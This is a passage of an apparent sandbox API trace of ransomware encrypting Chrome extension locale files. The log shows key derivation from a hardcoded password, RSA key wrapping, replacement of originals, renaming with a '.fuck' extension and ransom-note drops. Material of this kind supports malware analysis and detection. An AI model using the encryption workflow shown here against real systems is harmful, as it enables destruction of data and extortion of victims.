lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0252.994] CloseHandle (hObject=0x5d60) returned 1 [0252.994] CloseHandle (hObject=0x5d5c) returned 1 [0252.994] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), bFailIfExists=0) returned 1 [0252.998] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json", dwFileAttributes=0x0) returned 1 [0252.999] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.gsg")) returned 1 [0253.000] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.fuck")) returned 1 [0253.001] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.001] CryptDestroyKey (hKey=0x2984b20) returned 1 [0253.001] CryptReleaseContext (hProv=0x298d3c8, dwFlags=0x0) returned 1 [0253.001] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.001] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.002] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\readme_back_files.htm")) returned 0xffffffff [0253.002] AreFileApisANSI () returned 1 [0253.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.002] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.002] GetFileType (hFile=0x5d50) returned 0x1 [0253.003] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.004] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.004] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.004] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.004] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.004] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.004] GetLastError () returned 0x0 [0253.004] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json")) returned 0x20 [0253.005] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json", dwFileAttributes=0x80) returned 1 [0253.005] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.006] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.007] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.007] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.010] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.011] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.011] CryptHashData (hHash=0x29846a0, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.011] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29847e0) returned 1 [0253.011] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.011] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.011] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298c8a0) returned 1 [0253.011] CryptImportPublicKeyInfo (in: hCryptProv=0x298c8a0, dwCertEncodingType=0x1, pInfo=0x29950e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995110*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995118*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984b20) returned 1 [0253.011] CryptEncrypt (in: hKey=0x2984b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.012] CryptEncrypt (in: hKey=0x2984b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298d3c8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298d3c8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.012] WriteFile (in: hFile=0x5d60, lpBuffer=0x298d3c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298d3c8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.013] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdc, lpOverlapped=0x0) returned 1 [0253.014] CryptEncrypt (in: hKey=0x29847e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdc, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.014] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.014] CloseHandle (hObject=0x5d5c) returned 1 [0253.014] CloseHandle (hObject=0x5d60) returned 1 [0253.015] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), bFailIfExists=0) returned 1 [0253.019] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json", dwFileAttributes=0x0) returned 1 [0253.019] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.gsg")) returned 1 [0253.021] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.fuck")) returned 1 [0253.022] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.022] CryptDestroyKey (hKey=0x29847e0) returned 1 [0253.022] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.022] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.022] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.022] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\readme_back_files.htm")) returned 0xffffffff [0253.023] AreFileApisANSI () returned 1 [0253.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.023] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.024] GetFileType (hFile=0x5d50) returned 0x1 [0253.024] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.025] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.025] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.026] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.026] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.026] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.026] GetLastError () returned 0x0 [0253.026] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json")) returned 0x20 [0253.028] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json", dwFileAttributes=0x80) returned 1 [0253.028] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.029] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.030] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.030] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.032] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.032] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.032] CryptHashData (hHash=0x29846a0, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.033] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.033] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.033] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.033] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298c5f8) returned 1 [0253.033] CryptImportPublicKeyInfo (in: hCryptProv=0x298c5f8, dwCertEncodingType=0x1, pInfo=0x2994990*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29949c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29949c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984c20) returned 1 [0253.033] CryptEncrypt (in: hKey=0x2984c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.033] CryptEncrypt (in: hKey=0x2984c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298db38*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298db38*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.034] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298db38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298db38*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.035] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0253.036] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x130, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x140) returned 1 [0253.036] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x140, lpOverlapped=0x0) returned 1 [0253.036] CloseHandle (hObject=0x5d60) returned 1 [0253.036] CloseHandle (hObject=0x5d5c) returned 1 [0253.036] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), bFailIfExists=0) returned 1 [0253.040] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json", dwFileAttributes=0x0) returned 1 [0253.041] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.gsg")) returned 1 [0253.043] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.fuck")) returned 1 [0253.045] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.045] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.045] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.045] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.045] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.045] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\readme_back_files.htm")) returned 0xffffffff [0253.046] AreFileApisANSI () returned 1 [0253.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.046] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.046] GetFileType (hFile=0x5d50) returned 0x1 [0253.047] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, 